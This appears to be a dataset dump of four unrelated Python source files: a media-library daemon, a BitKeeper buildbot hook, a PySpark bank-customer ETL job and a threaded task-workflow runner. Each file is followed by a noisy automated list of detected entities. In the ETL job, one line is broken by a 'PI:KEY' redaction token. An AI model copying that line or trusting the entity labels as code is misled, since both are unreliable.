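# Illustrative note, not part of the original module: the __getattr__ hook
# above lets any registered ontology class be instantiated directly on the
# graph; the keyword arguments below are hypothetical:
#
#   graph = VersionedMediaGraph()
#   ep = graph.Episode(series='Some Series', season=1)
#
# Results that are Media instances additionally get lastModified stamped.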
@property
def config(self):
try:
return self.find_one(Config)
except ValueError:
return self.Config()
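# Example (hedged, illustrative values): thanks to __getattr__ above, any class
# registered in the ontology can be instantiated directly on the graph, and
# Media instances get their lastModified stamp set automatically:
#
#   g = VersionedMediaGraph()
#   ep = g.Episode(series='...', season=1, episodeNumber=3)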
class SmewtDaemon(object):
def __init__(self):
super(SmewtDaemon, self).__init__()
# Note: put log file in data dir instead of log dir so that it is
# accessible through the user/ folder static view
self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log')
setupLogging(filename=self.logfile, with_time=True, with_thread=True)
if smewt.config.PERSISTENT_CACHE:
self.loadCache()
# get a TaskManager for all the import tasks
self.taskManager = TaskManager()
# get our main graph DB
self.loadDB()
# get our collections: series and movies for now
self.episodeCollection = Collection(name = 'Series',
# import episodes and their subtitles too
validFiles = [ Episode.isValidEpisode,
Subtitle.isValidSubtitle ],
mediaTagger = EpisodeTagger,
dataGraph = self.database,
taskManager = self.taskManager)
self.movieCollection = Collection(name = 'Movie',
# import movies and their subtitles too
validFiles = [ Movie.isValidMovie,
Subtitle.isValidSubtitle ],
mediaTagger = MovieTagger,
dataGraph = self.database,
taskManager = self.taskManager)
if config.REGENERATE_THUMBNAILS:
# launch the regeneration of the thumbnails, but only after everything
# is setup and we are able to serve requests
Timer(3, self.regenerateSpeedDialThumbnails).start()
if self.database.config.get('tvuMldonkeyPlugin'):
# load up the feed watcher
self.feedWatcher = FeedWatcher(self)
# FIXME: this should go into a plugin.init() method
from smewt.plugins import mldonkey
mldonkey.send_command('vm')
# do not rescan as it would be too long and we might delete some files that
# are on an inaccessible network share or an external HDD
self.taskManager.add(FuncTask('Update collections', self.updateCollections))
def quit(self):
log.info('SmewtDaemon quitting...')
self.taskManager.finishNow()
try:
self.feedWatcher.quit()
except AttributeError:
pass
self.saveDB()
if smewt.config.PERSISTENT_CACHE:
self.saveCache()
log.info('SmewtDaemon quitting OK!')
def _cacheFilename(self):
return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache',
createdir=True)
def loadCache(self):
cache.load(self._cacheFilename())
def saveCache(self):
cache.save(self._cacheFilename())
def clearCache(self):
cache.clear()
cacheFile = self._cacheFilename()
log.info('Deleting cache file: %s' % cacheFile)
try:
os.remove(cacheFile)
except OSError:
pass
def loadDB(self):
dbfile = smewt.settings.get('database_file')
if not dbfile:
dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database',
createdir=True)
smewt.settings.set('database_file', dbfile)
log.info('Loading database from: %s', dbfile)
self.database = VersionedMediaGraph()
try:
self.database.load(dbfile)
except:
log.warning('Could not load database %s', dbfile)
def saveDB(self):
dbfile = smewt.settings.get('database_file')
log.info('Saving database to %s', dbfile)
self.database.save(dbfile)
def clearDB(self):
log.info('Clearing database...')
self.database.clear_keep_config()
self.database.save(smewt.settings.get('database_file'))
def updateCollections(self):
self.episodeCollection.update()
self.movieCollection.update()
def rescanCollections(self):
self.episodeCollection.rescan()
self.movieCollection.rescan()
def _regenerateSpeedDialThumbnails(self):
import shlex, subprocess
from PIL import Image
from StringIO import StringIO
webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0)
if not webkit2png:
log.warning('webkit2png not found. please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder')
return
def gen(path, filename):
width, height = 200, 150
log.info('Creating %dx%d screenshot for %s...' % (width, height, path))
filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True)
cmd = 'webkit2png -g 1000 600 ""http://localhost:6543%s""' % path
screenshot, _ = subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE).communicate()
im = Image.open(StringIO(screenshot))
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(filename, ""PNG"")
gen('/movies', 'allmovies.png')
gen('/movies/table', 'moviestable.png')
gen('/movies/recent', 'recentmovies.png')
gen('/series', 'allseries.png')
gen('/series/suggestions', 'episodesuggestions.png')
gen('/feeds', 'feeds.png')
def regenerateSpeedDialThumbnails(self):
self.taskManager.add(FuncTask('Regenerate thumbnails',
self._regenerateSpeedDialThumbnails))
",8704,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', ""self.taskManager.add(FuncTask('Regenerate""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']]"
94,"#!/usr/local/bin/python
#
# BitKeeper hook script.
#
# svn_buildbot.py was used as a base for this file, if you find any bugs or
# errors please email me.
#
# Amar Takhar dummy@email.com
'''
/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \
"""" --bbserver localhost --bbport 9989
'''
import commands
import sys
import os
import re
if sys.version_info < (2, 6):
import sets
# We have hackish ""-d"" handling here rather than in the Options
# subclass below because a common error will be to not have twisted in
# PYTHONPATH; we want to be able to print that error to the log if
# debug mode is on, so we set it up before the imports.
DEBUG = None
if '-d' in sys.argv:
i = sys.argv.index('-d')
DEBUG = sys.argv[i+1]
del sys.argv[i]
del sys.argv[i]
if DEBUG:
f = open(DEBUG, 'a')
sys.stderr = f
sys.stdout = f
from twisted.internet import defer, reactor
from twisted.python import usage
from twisted.spread import pb
from twisted.cred import credentials
class Options(usage.Options):
optParameters = [
['repository', 'r', None,
""The repository that was changed.""],
['revision', 'v', None,
""The revision that we want to examine (default: latest)""],
['branch', 'b', None,
""Name of the branch to insert into the branch field. (REQUIRED)""],
['category', 'c', None,
""Schedular category.""],
['bbserver', 's', 'localhost',
""The hostname of the server that buildbot is running on""],
['bbport', 'p', 8007,
""The port that buildbot is listening on""]
]
optFlags = [
['dryrun', 'n', ""Do not actually send changes""],
]
def __init__(self):
usage.Options.__init__(self)
def postOptions(self):
if self['repository'] is None:
raise usage.error(""You must pass --repository"")
class ChangeSender:
def getChanges(self, opts):
""""""Generate and stash a list of Change dictionaries, ready to be sent
to the buildmaster's PBChangeSource.""""""
# first we extract information about the files that were changed
repo = opts['repository']
print ""Repo:"", repo
rev_arg = ''
if opts['revision']:
rev_arg = '-r""%s""' % (opts['revision'], )
changed = commands.getoutput(""bk changes -v %s -d':GFILE:\\n' '%s'"" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del changed[0]
change_info = commands.getoutput(""bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'"" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del change_info[0]
who = change_info.pop(0)
branch = opts['branch']
message = '\n'.join(change_info)
revision = opts.get('revision')
changes = {'who': who,
'branch': branch,
'files': changed,
'comments': message,
'revision': revision}
if opts.get('category'):
changes['category'] = opts.get('category')
return changes
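# Example (hedged, illustrative values): for a one-file BitKeeper commit the
# dict built above looks roughly like:
#   {'who': 'amar', 'branch': 'main', 'files': ['src/foo.c'],
#    'comments': 'Fix overflow in foo()', 'revision': '1.2034'}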
def sendChanges(self, opts, changes):
pbcf = pb.PBClientFactory()
reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf)
d = pbcf.login(credentials.UsernamePassword('change', 'changepw'))
d.addCallback(self.sendAllChanges, changes)
return d
def sendAllChanges(self, remote, changes):
dl = remote.callRemote('addChange', changes)
return dl
def run(self):
opts = Options()
try:
opts.parseOptions()
if not opts['branch']:
print ""You must supply a branch with -b or --branch.""
sys.exit(1)
except usage.error, ue:
print opts
print ""%s: %s"" % (sys.argv[0], ue)
sys.exit()
changes = self.getChanges(opts)
if opts['dryrun']:
for k in changes.keys():
print ""[%10s]: %s"" % (k, changes[k])
print ""*NOT* sending any changes""
return
d = self.sendChanges(opts, changes)
def quit(*why):
print ""quitting! because"", why
reactor.stop()
def failed(f):
print ""FAILURE: %s"" % f
reactor.stop()
d.addErrback(failed)
d.addCallback(quit, ""SUCCESS"")
reactor.callLater(60, quit, ""TIMEOUT"")
reactor.run()
if __name__ == '__main__':
s = ChangeSender()
s.run()
",4654,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']]"
95,"#coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os
st = datetime.now()
conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
if sys.argv[5] == ""hive"":
sqlContext = HiveContext(sc)
else:
sqlContext = SQLContext(sc)
hdfs = sys.argv[3]
dbname = sys.argv[4]
# Dates needed for processing
etl_date = sys.argv[1]
# ETL date
V_DT = etl_date
# Previous day's date
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"")
# First day of the current month
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"")
# Last day of the previous month
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"")
# 10-character date (YYYY-MM-DD)
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"")
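# Worked example (illustrative): for etl_date = '20160315' the derivations above give
#   V_DT     = '20160315'    (ETL date)
#   V_DT_LD  = '20160314'    (previous day)
#   V_DT_FMD = '20160301'    (first day of the month)
#   V_DT_LMD = '20160229'    (last day of the previous month; 2016 is a leap year)
#   V_DT10   = '2016-03-15'  (10-character date)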
V_STEP = 0
O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*')
O_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"")
# Task [12] 001-01::
V_STEP = V_STEP + 1
# First delete all existing data from the target table
ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"")
# Copy a full snapshot over from yesterday's backup table
ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"")
F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")
sql = """"""
SELECT A.CUSTOMERID AS CUSTOMERID
,A.CUSTOMERNAME AS CUSTOMERNAME
,A.CUSTOMERTYPE AS CUSTOMERTYPE
,A.CERTTYPE AS CERTTYPE
,A.CERTID AS CERTID
,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD
,A.INPUTORGID AS INPUTORGID
,A.INPUTUSERID AS INPUTUSERID
,A.INPUTDATE AS INPUTDATE
,A.REMARK AS REMARK
,A.MFCUSTOMERID AS MFCUSTOMERID
,A.STATUS AS STATUS
,A.BELONGGROUPID AS BELONGGROUPID
,A.CHANNEL AS CHANNEL
,A.LOANCARDNO AS LOANCARDNO
,A.CUSTOMERSCALE AS CUSTOMERSCALE
,A.CORPORATEORGID AS CORPORATEORGID
,A.REMEDYFLAG AS REMEDYFLAG
,A.DRAWFLAG AS DRAWFLAG
,A.MANAGERUSERID AS MANAGERUSERID
,A.MANAGERORGID AS MANAGERORGID
,A.DRAWELIGIBILITY AS DRAWELIGIBILITY
,A.BLACKSHEETORNOT AS BLACKSHEETORNOT
,A.CONFIRMORNOT AS CONFIRMORNOT
,A.CLIENTCLASSN AS CLIENTCLASSN
,A.CLIENTCLASSM AS CLIENTCLASSM
,A.BUSINESSSTATE AS BUSINESSSTATE
,A.MASTERBALANCE AS MASTERBALANCE
,A.UPDATEDATE AS UPDATEDATE
,A.FR_ID AS FR_ID
,V_DT AS ODS_ST_DATE
,'LNA' AS ODS_SYS_ID
FROM O_CI_XDXT_CUSTOMER_INFO A -- customer basic information
""""""
sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"")
#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")
sql = """"""
SELECT DST.CUSTOMERID --customer ID:src.CUSTOMERID
,DST.CUSTOMERNAME --customer name:src.CUSTOMERNAME
,DST.CUSTOMERTYPE --customer type:src.CUSTOMERTYPE
,DST.CERTTYPE --certificate type:src.CERTTYPE
,DST.CERTID --certificate number:src.CERTID
,DST.CUSTOMERPASSWORD --customer password:src.CUSTOMERPASSWORD
,DST.INPUTORGID --registering organisation:src.INPUTORGID
,DST.INPUTUSERID --registering user:src.INPUTUSERID
,DST.INPUTDATE --registration date:src.INPUTDATE
,DST.REMARK --remarks:src.REMARK
,DST.MFCUSTOMERID --core-system customer number:src.MFCUSTOMERID
,DST.STATUS --status:src.STATUS
,DST.BELONGGROUPID --affiliated group code:src.BELONGGROUPID
,DST.CHANNEL --channel:src.CHANNEL
,DST.LOANCARDNO --loan card number:src.LOANCARDNO
,DST.CUSTOMERSCALE --customer scale:src.CUSTOMERSCALE
,DST.CORPORATEORGID --legal-entity organisation number:src.CORPORATEORGID
,DST.REMEDYFLAG --backfill flag:src.REMEDYFLAG
,DST.DRAWFLAG --collection flag:src.DRAWFLAG
,DST.MANAGERUSERID --account manager:src.MANAGERUSERID
,DST.MANAGERORGID --managing organisation ID:src.MANAGERORGID
,DST.DRAWELIGIBILITY --collection eligibility info:src.DRAWELIGIBILITY
,DST.BLACKSHEETORNOT --blacklisted customer or not:src.BLACKSHEETORNOT
,DST.CONFIRMORNOT --confirmed/effective or not:src.CONFIRMORNOT
,DST.CLIENTCLASSN --current customer classification:src.CLIENTCLASSN
,DST.CLIENTCLASSM --adjusted customer classification:src.CLIENTCLASSM
,DST.BUSINESSSTATE --legacy-stock field flag:src.BUSINESSSTATE
,DST.MASTERBALANCE --single-account balance:src.MASTERBALANCE
,DST.UPDATEDATE --update date:src.UPDATEDATE
,DST.FR_ID --legal entity code:src.FR_ID
,DST.ODS_ST_DATE --platform date:src.ODS_ST_DATE
,DST.ODS_SYS_ID --source system code:src.ODS_SYS_ID
FROM F_CI_XDXT_CUSTOMER_INFO DST
LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC
ON SRC.CUSTOMERID = DST.CUSTOMERID
AND SRC.FR_ID = DST.FR_ID
WHERE SRC.CUSTOMERID IS NULL """"""
sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)
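# Upsert pattern: F_CI_XDXT_CUSTOMER_INFO_INNTMP1 holds the freshly transformed
# rows, while the anti-join above (WHERE SRC.CUSTOMERID IS NULL) keeps in
# INNTMP2 only the existing rows that were NOT refreshed. The union below
# (line partially redacted) therefore rebuilds the complete snapshot before it
# is written back out.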
dfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet""
PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()
nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()
nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite')
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()
et = datetime.now()
print(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa)
ret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"")
# First delete the backup table's data for the current day
ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")
# Copy a full snapshot of today's table into the backup table
ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")
",7703,"[['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']]"
96,"#!/usr/bin/python
""""""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: Eric Shook (dummy@email.com)
""""""
import os
import datetime
import time
import re
import subprocess
from Queue import Queue
#from threading import Thread
import threading
import sys,getopt
'''
The workflow script accepts a tasklist file, which contains a list of taskfiles.
A task may represent a simulation of an ABM or climate model. Tasks can run
simultaneously when there are no dependencies, or in order when dependencies
exist. Tasks may also include pre-processing or post-processing tasks.
'''
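# Example layout (illustrative names, not from the source): a tasklist file
# simply lists one taskfile path per line, and each taskfile names a program
# and its parameters in the format parsed by runtask() below:
#
#   tasklist.txt:
#       tasks/task1.file
#       tasks/task2.file
#
#   tasks/task1.file:
#       program: /usr/local/bin/abm_model
#       parameters: -config experiment1.cfg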
# TODO: Logging may be useful if the workflow becomes long
# TODO: Currently num_threads is user-defined; it controls the number of threads used to launch tasks.
# However, it would be better to include in the taskfile the number of cores needed
# and define the number of cores available, enabling the workflow system to manage core allocation
# Global variables
# The number of threads used to handle tasks is passed as a parameter
num_threads=0
# Array of threads (so they can be killed if needed)
threads=[]
# Array of task workflow numbers (one per thread/worker)
threadtasknums=[]
# Task queue
taskqueue=Queue()
# This function handles executing a task defined by a taskfile
def runtask(taskfile):
# Read and parse the taskfile with the following format
# Note additional parameters will likely be added based on need (e.g., CWD, data-dir)
'''
program: /path/to/executable_with_a_name
parameters: param1 -Optionalconfiguration param2 -AnotherParameter
'''
with open(taskfile,'r') as f:
# Set the required parameters as None for error checking at the end
program=None
parameters=None
for line in f:
if line.startswith(""program:""):
# Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())
program=line.split("":"",1)[1].strip()
#print ""Program=""+program
if line.startswith(""parameters:""):
# Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())
parameters=line.split("":"",1)[1].strip()
#print ""Parameters=""+parameters
# Error checking for required parameters
if program==None:
raise Exception(""program missing in taskfile"",taskfile)
if parameters==None:
raise Exception(""parameters missing in taskfile"",taskfile)
print ""Calling program=""+program,parameters
'''
In future versions that have defined input,output,stdout,etc.
there could be more logic here to:
- run each model in a defined directory
- output stdout,stderr in the directory
- package up output files for easier transfer
- ...
'''
returncode=subprocess.check_call(program+"" ""+parameters,shell=True)
# A task worker loops while there are tasks left in the taskqueue
# Input parameter is a thread id (tid)
def taskworker(tid):
while not taskqueue.empty():
taskfile=taskqueue.get()
tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip()
tasknum=re.sub(""\D"", """", tasknum)
#print ""tid="",tid
threadtasknums[tid]=int(tasknum)
# While there is a dependency problem (lower order task numbers are still being processed)
# then spintwait
mintasknum=min(threadtasknums)
while threadtasknums[tid]>mintasknum:
#print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i]
#if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum
# break # then there are no dependencies, so you can break out of this infinite loop
time.sleep(1) # this is a spin-wait loop
mintasknum=min(*threadtasknums)
print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now())
try:
runtask(taskfile)
except:
exit(1)
taskqueue.task_done()
threadtasknums[tid]=999999 # Set the tasknum for tid to 999999 so it doesn't influence dependencies
print ""Thread"",tid,""quitting, because taskqueue is empty""
# Main program code
def main():
print ""Starting node workflow""
try:
opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""])
except getopt.GetoptError:
print ""workflow.py -n -t ""
sys.exit(1)
# Set model filename and experiment name based on command-line parameter
num_threads=0
tasklistfile=""""
for opt, arg in opts:
if opt in (""-n"", ""--numthreads""):
num_threads=int(arg)
if opt in (""-t"", ""--tasklist""):
tasklistfile=arg
err=0
if num_threads<=0:
print "" [ ERROR ] Number of threads must be greater than 0""
err=1
if tasklistfile=="""":
print "" [ ERROR ] Must provide tasklistfile""
err=1
if err==1:
print ""workflow.py -n -t ""
sys.exit(1)
print ""Executing in current directory :"",os.getcwd()
print ""Reading tasklist file""
with open(tasklistfile,'r') as f:
taskfiles = f.readlines()
f.close()
# tasksdir = 'tasks/'
# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process
taskfiles.sort()
print ""Starting task queue""
for taskfile in taskfiles:
taskqueue.put(taskfile.strip())
print ""Task queue contains "",taskqueue.qsize(),"" tasks""
# Start the workflow engine
# Currently the logic is simple -> one task==one thread==one core but that will need
# to be modified to account for multithreaded models (agent-based and climate)
# so eventually this will need to parse the task to determine the number of cores
# needed by the task and dynamically manage the number of tasks running simultaneously
print ""Starting "",num_threads,"" threads""
for i in range(num_threads):
threadtasknums.append(-1)
t=threading.Thread(target=taskworker,args=(i,))
t.daemon=True
t.setDaemon(True) # redundant with the line above; setDaemon() is the pre-2.6 spelling
t.start()
threads.append(t)
# Now we wait until all of the tasks are finished.
print ""Waiting for threads to finish""
# Normally you can use a blocking .join, but then you cannot kill the process
# So instead we spin-wait and catch ^C so a user can kill this process.
# while threading.activeCount() > 0:
# time.sleep(20)
while taskqueue.qsize()>0:
time.sleep(1)
print ""taskqueue size"",taskqueue.qsize()
''' # FIXME: Need to clean up this code, which was used for testing ^C
try:
time.sleep(5) # Wait 5 seconds before checking again
# FIXME: In production this should be changed to 30
# If Ctrl+C or other error, kill all of the threads
except:
